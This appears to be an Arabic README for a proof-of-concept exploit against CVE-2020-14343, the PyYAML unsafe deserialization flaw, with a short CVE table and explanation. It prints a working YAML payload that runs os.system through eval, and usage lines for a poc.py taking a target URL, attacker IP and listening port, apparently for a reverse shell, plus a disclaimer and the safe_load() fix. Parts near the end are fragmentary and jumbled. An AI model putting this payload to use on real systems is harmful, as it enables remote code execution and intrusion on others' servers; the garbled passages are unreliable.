
حمولة CVE-2020-14343
| العنصر | المعلومات |
|---|
| رقم CVE | CVE-2020-14343 |
| المكون المتأثر | PyYAML < 5.4 |
| نوع الثغرة | إلغاء التسلسل لتنفيذ كود عن بعد (RCE) |
| مستوى الخطورة | عالي |
عند استخدام PyYAML لدالة yaml.load() لتحليل بيانات غير موثوقة، فإنه لا يقيد علامات YAML الخطيرة (مثل !!python/object)، مما يسمح للمهاجم بإنشاء محتوى YAML ضار لتنفيذ كود Python تعسفي.
جوهر الحمولة (Payload):
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <الهدف URL> <عنوان IP المهاجم> <منفذ الاستماع>
مثال:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload على الهدف/login لتحميل وتحليل ملف YAMLpip install requests
⚠️ هذه الأداة مخصصة فقط للبحث الأمني والاختبار المصرح به!
yaml.safe_load() بدلاً من yaml.load()